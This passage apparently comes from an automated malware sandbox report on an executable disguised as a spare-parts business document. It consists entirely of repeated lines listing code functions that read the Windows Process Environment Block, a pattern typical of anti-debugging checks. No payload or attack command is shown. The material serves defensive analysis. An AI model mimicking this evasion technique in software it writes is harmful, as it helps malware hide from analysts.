                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0770 mov eax, dword ptr fs:[00000030h]4_2_011A0770
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01214755 mov eax, dword ptr fs:[00000030h]4_2_01214755
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121E75D mov eax, dword ptr fs:[00000030h]4_2_0121E75D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012447A0 mov eax, dword ptr fs:[00000030h]4_2_012447A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123678E mov eax, dword ptr fs:[00000030h]4_2_0123678E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011907AF mov eax, dword ptr fs:[00000030h]4_2_011907AF
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121E7E1 mov eax, dword ptr fs:[00000030h]4_2_0121E7E1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119C7C0 mov eax, dword ptr fs:[00000030h]4_2_0119C7C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012107C3 mov eax, dword ptr fs:[00000030h]4_2_012107C3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011947FB mov eax, dword ptr fs:[00000030h]4_2_011947FB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011947FB mov eax, dword ptr fs:[00000030h]4_2_011947FB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]4_2_011B27ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]4_2_011B27ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B27ED mov eax, dword ptr fs:[00000030h]4_2_011B27ED
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D2619 mov eax, dword ptr fs:[00000030h]4_2_011D2619
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A260B mov eax, dword ptr fs:[00000030h]4_2_011A260B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E609 mov eax, dword ptr fs:[00000030h]4_2_0120E609
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119262C mov eax, dword ptr fs:[00000030h]4_2_0119262C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C6620 mov eax, dword ptr fs:[00000030h]4_2_011C6620
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C8620 mov eax, dword ptr fs:[00000030h]4_2_011C8620
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AE627 mov eax, dword ptr fs:[00000030h]4_2_011AE627
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125866E mov eax, dword ptr fs:[00000030h]4_2_0125866E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125866E mov eax, dword ptr fs:[00000030h]4_2_0125866E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011AC640 mov eax, dword ptr fs:[00000030h]4_2_011AC640
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C2674 mov eax, dword ptr fs:[00000030h]4_2_011C2674
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA660 mov eax, dword ptr fs:[00000030h]4_2_011CA660
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA660 mov eax, dword ptr fs:[00000030h]4_2_011CA660
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194690 mov eax, dword ptr fs:[00000030h]4_2_01194690
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194690 mov eax, dword ptr fs:[00000030h]4_2_01194690
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C66B0 mov eax, dword ptr fs:[00000030h]4_2_011C66B0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC6A6 mov eax, dword ptr fs:[00000030h]4_2_011CC6A6
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012106F1 mov eax, dword ptr fs:[00000030h]4_2_012106F1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012106F1 mov eax, dword ptr fs:[00000030h]4_2_012106F1
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]4_2_0120E6F2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]4_2_0120E6F2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]4_2_0120E6F2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E6F2 mov eax, dword ptr fs:[00000030h]4_2_0120E6F2
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA6C7 mov ebx, dword ptr fs:[00000030h]4_2_011CA6C7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA6C7 mov eax, dword ptr fs:[00000030h]4_2_011CA6C7
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188918 mov eax, dword ptr fs:[00000030h]4_2_01188918
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01188918 mov eax, dword ptr fs:[00000030h]4_2_01188918
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0122892B mov eax, dword ptr fs:[00000030h]4_2_0122892B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121892A mov eax, dword ptr fs:[00000030h]4_2_0121892A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E908 mov eax, dword ptr fs:[00000030h]4_2_0120E908
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120E908 mov eax, dword ptr fs:[00000030h]4_2_0120E908
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121C912 mov eax, dword ptr fs:[00000030h]4_2_0121C912
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01234978 mov eax, dword ptr fs:[00000030h]4_2_01234978
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01234978 mov eax, dword ptr fs:[00000030h]4_2_01234978
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121C97C mov eax, dword ptr fs:[00000030h]4_2_0121C97C
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01210946 mov eax, dword ptr fs:[00000030h]4_2_01210946
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D096E mov eax, dword ptr fs:[00000030h]4_2_011D096E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D096E mov edx, dword ptr fs:[00000030h]4_2_011D096E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011D096E mov eax, dword ptr fs:[00000030h]4_2_011D096E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]4_2_011B6962
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]4_2_011B6962
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B6962 mov eax, dword ptr fs:[00000030h]4_2_011B6962
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012189B3 mov esi, dword ptr fs:[00000030h]4_2_012189B3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012189B3 mov eax, dword ptr fs:[00000030h]4_2_012189B3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012189B3 mov eax, dword ptr fs:[00000030h]4_2_012189B3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011909AD mov eax, dword ptr fs:[00000030h]4_2_011909AD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011909AD mov eax, dword ptr fs:[00000030h]4_2_011909AD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A29A0 mov eax, dword ptr fs:[00000030h]4_2_011A29A0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121E9E0 mov eax, dword ptr fs:[00000030h]4_2_0121E9E0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0119A9D0 mov eax, dword ptr fs:[00000030h]4_2_0119A9D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C49D0 mov eax, dword ptr fs:[00000030h]4_2_011C49D0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_012269C0 mov eax, dword ptr fs:[00000030h]4_2_012269C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C29F9 mov eax, dword ptr fs:[00000030h]4_2_011C29F9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C29F9 mov eax, dword ptr fs:[00000030h]4_2_011C29F9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125A9D3 mov eax, dword ptr fs:[00000030h]4_2_0125A9D3
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123483A mov eax, dword ptr fs:[00000030h]4_2_0123483A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123483A mov eax, dword ptr fs:[00000030h]4_2_0123483A
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CA830 mov eax, dword ptr fs:[00000030h]4_2_011CA830
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov ecx, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B2835 mov eax, dword ptr fs:[00000030h]4_2_011B2835
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121C810 mov eax, dword ptr fs:[00000030h]4_2_0121C810
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194859 mov eax, dword ptr fs:[00000030h]4_2_01194859
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01194859 mov eax, dword ptr fs:[00000030h]4_2_01194859
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011C0854 mov eax, dword ptr fs:[00000030h]4_2_011C0854
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226870 mov eax, dword ptr fs:[00000030h]4_2_01226870
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226870 mov eax, dword ptr fs:[00000030h]4_2_01226870
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121E872 mov eax, dword ptr fs:[00000030h]4_2_0121E872
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121E872 mov eax, dword ptr fs:[00000030h]4_2_0121E872
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A2840 mov ecx, dword ptr fs:[00000030h]4_2_011A2840
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190887 mov eax, dword ptr fs:[00000030h]4_2_01190887
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121C89D mov eax, dword ptr fs:[00000030h]4_2_0121C89D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125A8E4 mov eax, dword ptr fs:[00000030h]4_2_0125A8E4
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BE8C0 mov eax, dword ptr fs:[00000030h]4_2_011BE8C0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC8F9 mov eax, dword ptr fs:[00000030h]4_2_011CC8F9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CC8F9 mov eax, dword ptr fs:[00000030h]4_2_011CC8F9
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01258B28 mov eax, dword ptr fs:[00000030h]4_2_01258B28
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01258B28 mov eax, dword ptr fs:[00000030h]4_2_01258B28
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEB20 mov eax, dword ptr fs:[00000030h]4_2_011BEB20
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEB20 mov eax, dword ptr fs:[00000030h]4_2_011BEB20
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0120EB1D mov eax, dword ptr fs:[00000030h]4_2_0120EB1D
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01238B42 mov eax, dword ptr fs:[00000030h]4_2_01238B42
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]4_2_01226B40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01226B40 mov eax, dword ptr fs:[00000030h]4_2_01226B40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0125AB40 mov eax, dword ptr fs:[00000030h]4_2_0125AB40
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0118CB7E mov eax, dword ptr fs:[00000030h]4_2_0118CB7E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]4_2_01244B4B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244B4B mov eax, dword ptr fs:[00000030h]4_2_01244B4B
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EB50 mov eax, dword ptr fs:[00000030h]4_2_0123EB50
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]4_2_01244BB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01244BB0 mov eax, dword ptr fs:[00000030h]4_2_01244BB0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]4_2_011A0BBE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011A0BBE mov eax, dword ptr fs:[00000030h]4_2_011A0BBE
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B0BCB mov eax, dword ptr fs:[00000030h]4_2_011B0BCB
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121CBF0 mov eax, dword ptr fs:[00000030h]4_2_0121CBF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01190BCD mov eax, dword ptr fs:[00000030h]4_2_01190BCD
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEBFC mov eax, dword ptr fs:[00000030h]4_2_011BEBFC
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_01198BF0 mov eax, dword ptr fs:[00000030h]4_2_01198BF0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0123EBD0 mov eax, dword ptr fs:[00000030h]4_2_0123EBD0
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA38 mov eax, dword ptr fs:[00000030h]4_2_011CCA38
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]4_2_011B4A35
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011B4A35 mov eax, dword ptr fs:[00000030h]4_2_011B4A35
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_0121CA11 mov eax, dword ptr fs:[00000030h]4_2_0121CA11
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011BEA2E mov eax, dword ptr fs:[00000030h]4_2_011BEA2E
                      Source: C:\Users\user\Desktop\XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeCode function: 4_2_011CCA24 mov eax, dword ptr fs:[00000030h]4_2_011CCA24
